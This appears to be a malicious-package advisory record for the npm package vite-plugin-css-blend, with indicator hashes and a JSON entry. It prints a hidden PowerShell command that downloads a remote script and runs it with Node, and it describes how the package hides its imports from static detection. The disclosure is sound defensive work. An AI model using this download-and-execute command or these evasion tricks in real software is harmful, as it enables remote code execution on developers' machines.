MAL-2026-4706
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76)
The package is published as a Vite CSS plugin but exposes no Vite plugin API. Its documented applyGlobalStyles({palette, accents}) export, when called on Windows, treats the caller-supplied accents and palette strings as an AES-256-CBC IV and ciphertext, decrypts them with a hardcoded key, and spawns powershell.exe -WindowStyle Hidden -NoProfile -Command "irm <decrypted-url> -o $env:TEMP\s.js; node $env:TEMP\s.js" — fetching and executing an attacker-controlled JavaScript payload via Node. The node:crypto and node:child_process modules are imported via string-array join (["no","de",":","cry","pto"].join(""), ["no","de",":","chi","ld","_pro","cess"].join("")) to evade static import detection. The package further ships ~200 numbered no-op exports (e.g., isWithinBoundary1..200, applyPreset1..150, createSequenceStep1..250) as filler to camouflage the malicious export among legitimate-looking utilities, and its name baits developers searching the Vite ecosystem. Any consumer following the documented API on a Windows host triggers download-and-execute of arbitrary remote code.
- CWE-506 - The product contains code that appears to be malicious in nature.
{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "dist/index.js",
              "sha256": "e8113412636bd5c602bc9cdd9f4f989947d8271899da7963a0411830b966f1ad",
              "tlsh": "e9c3ffcab1a23132d32b686048bf018bf377dda0177e4481d159a2adb63441ea5b7f7d"
            },
            {
              "path": "package.json",
              "sha256": "adb2dcdf06ad36894d9eb5eac3659a71a1a05c4fcb4636743b28c552d2437b95",
              "tlsh": "32012b308520482307d90573aca81643aaa58d6f5644bc08379e402c4bde6ab41fe77d"
            }
          ],
          "package_integrity": [
            {
              "filename": "vite-plugin-css-blend-1.0.0.tgz",
              "hashes": {
                "sha1": "ba0320dec92a685a5a9ab6c00b33002cca7dba9f",
                "sha512_sri": "sha512-jS+E8kmq4UNZjCMf3vl7zW7oAuFs1Ii0gftpuMnCJJ5n2Qm2xLUUEnkY0SxWY7/CFWwYlYSDC3oOh9b/cwTQDw=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite-plugin-css-blend"
      },
      "versions": [
        "1.0.0"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "actran@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-004520",
        "import_time": "2026-05-26T05:52:45.958440733Z",
        "modified_time": "2026-05-24T17:15:49Z",
        "sha256": "7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76",
        "source": "amazon-inspector",
        "versions": [
          "1.0.0"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76)\nThe package is published as a Vite CSS plugin but exposes no Vite plugin API. Its documented `applyGlobalStyles({palette, accents})` export, when called on Windows, treats the caller-supplied `accents` and `palette` strings as an AES-256-CBC IV and ciphertext, decrypts them with a hardcoded key, and spawns `powershell.exe -WindowStyle Hidden -NoProfile -Command \"irm \u003cdecrypted-url\u003e -o $env:TEMP\\s.js; node $env:TEMP\\s.js\"` \u2014 fetching and executing an attacker-controlled JavaScript payload via Node. The `node:crypto` and `node:child_process` modules are imported via string-array join (`[\"no\",\"de\",\":\",\"cry\",\"pto\"].join(\"\")`, `[\"no\",\"de\",\":\",\"chi\",\"ld\",\"_pro\",\"cess\"].join(\"\")`) to evade static import detection. The package further ships ~200 numbered no-op exports (e.g., `isWithinBoundary1..200`, `applyPreset1..150`, `createSequenceStep1..250`) as filler to camouflage the malicious export among legitimate-looking utilities, and its name baits developers searching the Vite ecosystem. Any consumer following the documented API on a Windows host triggers download-and-execute of arbitrary remote code.\n",
  "id": "MAL-2026-4706",
  "modified": "2026-05-24T17:15:49Z",
  "published": "2026-05-24T17:15:49Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/vite-plugin-css-blend/v/1.0.0"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in vite-plugin-css-blend (npm)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.